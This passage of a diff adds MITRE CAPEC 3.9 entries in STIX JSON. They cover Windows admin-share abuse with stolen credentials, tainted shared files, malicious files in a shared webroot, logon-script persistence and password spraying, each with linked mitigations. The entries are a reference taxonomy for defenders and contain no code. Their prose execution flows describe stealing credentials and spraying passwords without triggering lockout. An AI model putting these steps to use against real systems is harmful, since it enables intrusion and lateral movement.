+ "id": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00382075-fd38-4145-ac07-88fa46ab5e82", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not reuse local administrator account credentials across systems.", + "id": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8e80f453-8c74-45c3-ad17-5cceded60e65", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deny remote use of local admin credentials to log into domain systems.", + "id": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5d4dbec9-a56a-4a81-9a64-a9d70c3cdcac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow accounts to be a local administrator on more than one system.", + "id": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c44dcaf3-84a3-4fc1-a9c4-3c1c06dbeac1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--44f48a42-3c74-4fbb-885b-d16e52d1e21f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor system and domain logs for abnormal credential access.", + "id": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6871bf92-f743-4558-b1fd-ca894de9bb78", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary guesses or obtains (i.e. steals or purchases) legitimate Windows administrator credentials (e.g. userID/password) to access Windows Admin Shares on a local machine or within a Windows domain.", + "external_references": [ + { + "external_id": "CAPEC-561", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/561.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Remote Services:SMB/Windows Admin Shares", + "external_id": "T1021.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1021/002" + }, + { + "description": "Overview of problems that may occur when administrative shares are missing, 2017--03---13, Microsoft Corporation", + "external_id": "REF-577", + "source_name": "reference_from_CAPEC", + "url": "https://support.microsoft.com/en-us/help/842715/overview-of-problems-that-may-occur-when-administrative-shares-are-mis" + }, + { + "description": "Rob Smallridge, HAPT15 is alive and strong: An analysis of RoyalCli and RoyalDNS, 2018--03---10, NCC Group", + "external_id": "REF-578", + "source_name": "reference_from_CAPEC", + "url": "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + }, + { + "description": "Assaf Dahan, Operation Cobalt Kitty: Cybereason Labs Analysis, 2017, CyberReason", + "external_id": "REF-579", + "source_name": "reference_from_CAPEC", + "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + } + ], + "id": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Windows Admin Shares with Stolen Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3", + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "APT32 has leveraged Windows' built-in Net utility to use Windows Administrative Shares to copy and execute remote malware. [REF-579]", + "In May 2017, APT15 laterally moved within a Windows domain via Windows Administrative Shares to copy files to and from compromised host systems. This further allowed for the remote execution of malware. [REF-578]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Windows administrator credentials: The adversary must obtain known Windows administrator credentials in order to access the administrative network shares.

    2. Techniques
    An adversary purchases breached Windows administrator credentials from the dark web.
    An adversary leverages a key logger or phishing attack to steal administrator credentials as they are provided.
    An adversary conducts a sniffing attack to steal Windows administrator credentials as they are transmitted.
    An adversary gains access to a Windows domain system/files and exfiltrates Windows administrator password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded Windows administrator credentials.

Experiment

  1. Attempt domain authentication: Try each Windows administrator credential against the hidden network shares until the target grants access.

    2. Techniques
    Manually or automatically enter each administrator credential through the target's interface.

Exploit

  1. Malware Execution: An adversary can remotely execute malware within the administrative network shares to infect other systems within the domain.

  2. Data Exfiltration: The adversary can remotely obtain sensitive data contained within the administrative network shares.

", + "x_capec_extended_description": "\n Windows systems within the Windows NT family contain hidden network shares that are only accessible to system administrators. These shares allow administrators to remotely access all disk volumes on a network-connected system and further allow for files to be copied, written, and executed, along with other administrative actions. Example network shares include: C$, ADMIN$ and IPC$. If an adversary is able to obtain legitimate Windows credentials, the hidden shares can be accessed remotely, via server message block (SMB) or the Net utility, to transfer files and execute code. It is also possible for adversaries to utilize NTLM hashes to access administrator shares on systems with certain configuration and patch levels.\n ", + "x_capec_prerequisites": [ + "The system/application is connected to the Windows domain.", + "The target administrative share allows remote use of local admin credentials to log into domain systems.", + "The adversary possesses a list of known Windows administrator credentials that exist on the target domain." + ], + "x_capec_resources_required": [ + "A list of known Windows administrator credentials for the targeted domain." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Windows credential, leveraging it is trivial." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eecc445b-fbb2-4188-870d-159485c94ef0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "spec_version": "2.1", + "target_ref": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11eaef47-9b8a-4bb8-bf2f-63eb95d12037", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "spec_version": "2.1", + "target_ref": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f482b089-26b2-468c-8161-bd9eea7cfe4b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "spec_version": "2.1", + "target_ref": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the files in a shared location by adding malicious programs, scripts, or exploit code to valid content. Once a user opens the shared content, the tainted content is executed.", + "external_references": [ + { + "external_id": "CAPEC-562", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/562.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Taint shared content", + "external_id": "T1080", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1080" + } + ], + "id": "attack-pattern--9d076056-3719-4afc-94f4-5d16aaee50a3", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Modify Shared File", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disallow shared content. Protect shared folders by minimizing users that have write access. Use utilities that mitigate exploitation like the Microsoft Enhanced Mitigation Experience Toolkit (EMET) to prevent exploits from being run.", + "id": "course-of-action--7c8c48ad-29e9-48a7-803e-dd6994eed5fd", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-562-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48a3e4bb-b139-4cfd-ad9b-bcafd4087f57", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c8c48ad-29e9-48a7-803e-dd6994eed5fd", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d076056-3719-4afc-94f4-5d16aaee50a3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversaries may add malicious content to a website through the open file share and then browse to that content with a web browser to cause the server to execute the content. The malicious content will typically run under the context and permissions of the web server process, often resulting in local system or administrative privileges depending on how the web server is configured.", + "external_references": [ + { + "external_id": "CAPEC-563", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/563.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + } + ], + "id": "attack-pattern--80604cc1-88b5-4e55-846e-01cfc67966b2", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Add Malicious File to Shared Webroot", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions on directories that are accessible through a web server. Disallow remote access to the web root. Disable execution on directories within the web root. Ensure that permissions of the web server process are only what is required by not using built-in accounts and instead create specific accounts to limit unnecessary access or permissions overlap across multiple systems.", + "id": "course-of-action--fa8958ed-8fb1-4412-9a43-882a8093afba", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-563-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fac83968-b4fb-49f5-b904-487038f291fe", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fa8958ed-8fb1-4412-9a43-882a8093afba", + "spec_version": "2.1", + "target_ref": "attack-pattern--80604cc1-88b5-4e55-846e-01cfc67966b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operating system allows logon scripts to be run whenever a specific user or users logon to a system. If adversaries can access these scripts, they may insert additional code into the logon script. This code can allow them to maintain persistence or move laterally within an enclave because it is executed every time the affected user or users logon to a computer. Modifying logon scripts can effectively bypass workstation and enclave firewalls. Depending on the access configuration of the logon scripts, either local credentials or a remote administrative account may be necessary.", + "external_references": [ + { + "external_id": "CAPEC-564", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/564.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Boot or Logon Initialization Scripts", + "external_id": "T1037", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1037" + }, + { + "description": "Create or Modify System Process: Launch Agent", + "external_id": "T1543.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543/001" + }, + { + "description": "Create or Modify System Process: Launch Daemon", + "external_id": "T1543.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543/004" + }, + { + "description": "Boot or Logon Autostart Execution", + "external_id": "T1547", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547" + } + ], + "id": "attack-pattern--b63b2869-11e6-4849-8ddf-ae2557bf554b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Run Software at Logon", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Restrict write access to logon scripts to necessary administrators.", + "id": "course-of-action--ac6fb253-4318-4476-bd92-98025e9f081b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-564-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b0065118-5899-4093-ad4e-1d2e77d85ff5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac6fb253-4318-4476-bd92-98025e9f081b", + "spec_version": "2.1", + "target_ref": "attack-pattern--b63b2869-11e6-4849-8ddf-ae2557bf554b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n In a Password Spraying attack, an adversary tries a small list (e.g. 3-5) of common or expected passwords, often matching the target's complexity policy, against a known list of user accounts to gain valid credentials. The adversary tries a particular password for each user account, before moving onto the next password in the list. This approach assists the adversary in remaining undetected by avoiding rapid or frequent account lockouts. The adversary may then reattempt the process with additional passwords, once enough time has passed to prevent inducing a lockout.\n ", + "external_references": [ + { + "external_id": "CAPEC-565", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Brute Force:Password Spraying", + "external_id": "T1110.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/003" + }, + { + "description": "ACSC Releases Advisory on Password Spraying Attacks, 2019--08---08, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-565", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/current-activity/2019/08/08/acsc-releases-advisory-password-spraying-attacks" + }, + { + "description": "Andy Greenberg, A notorious Iranian hacking crew is targeting industrial control systems, 2019--11---23, Ars Technica", + "external_id": "REF-566", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2019/11/a-notorious-iranian-hacking-crew-is-targeting-industrial-control-systems/" + }, + { + "description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-567", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + } + ], + "id": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Password Spraying", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user selects the phrase \"Password123\" as their password, believing that it would be very difficult to guess. Password Spraying, leveraging a list of commonly used passwords, is used to crack this password and gain access to the account.", + "The Iranian hacker group APT33 (AKA Holmium, Refined Kitten, or Elfin) carried out numerous Password Spraying attacks in 2019. On average, APT33 targeted 2,000 organizations per month, with upwards of 10 million authentication attempts each day. The majority of these attacks targeted manufacturers, suppliers, or maintainers of industrial control system equipment." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target's password policy: Determine the password policies of the target system/application.

    2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

  2. Select passwords: Pick the passwords to be used in the attack (e.g. commonly used passwords, passwords tailored to individual users, etc.)

    3. Techniques
    Select passwords based on common use or a particular user's additional details.
    Select passwords based on the target's password complexity policies.

Exploit

  1. Brute force password: Given the finite space of possible passwords dictated by information determined in the previous steps, try each password for all known user accounts until the target grants access.

    2. Techniques
    Manually or automatically enter the first password for each known user account through the target's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.
    Iterate through the remaining passwords for each known user account.
", + "x_capec_extended_description": "\n Password Spraying attacks often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications. Successful execution of Password Spraying attacks usually lead to lateral movement within the target, which allows the adversary to impersonate the victim or execute any action that the victim is authorized to perform. If the password chosen by the user is commonly used or easily guessed, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.\n Password Spraying Attacks are similar to Dictionary-based Password Attacks (CAPEC-16) in that they both leverage precompiled lists (i.e. dictionaries) of username/password combinations to try against a system/application. The primary difference is that Password Spraying Attacks leverage a known list of user accounts and only try one password for each account before moving onto the next password. In contrast, Dictionary-based Password Attacks leverage unknown username/password combinations and are often executed offline against files containing hashed credentials, where inducing an account lockout is not a concern.\n Password Spraying Attacks are also similar to Credential Stuffing attacks (CAPEC-600), since both utilize known user accounts and often attack the same targets. Credential Stuffing attacks, however, leverage known username/password combinations, whereas Password Spraying attacks have no insight into known username/password pairs. If a Password Spraying attack succeeds, it may additionally lead to Credential Stuffing attacks on different targets.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts on the target system/application." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD).", + "Applicable password lists.", + "A password cracking tool or a custom script that leverages the password list to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A Password Spraying attack is very straightforward. A variety of password cracking tools are widely available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--883bf7e0-d6d7-4599-a405-4cf773ba06f2", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--63dc5428-39f8-4790-9341-12ee76d16b3c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "spec_version": "2.1", + "target_ref": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 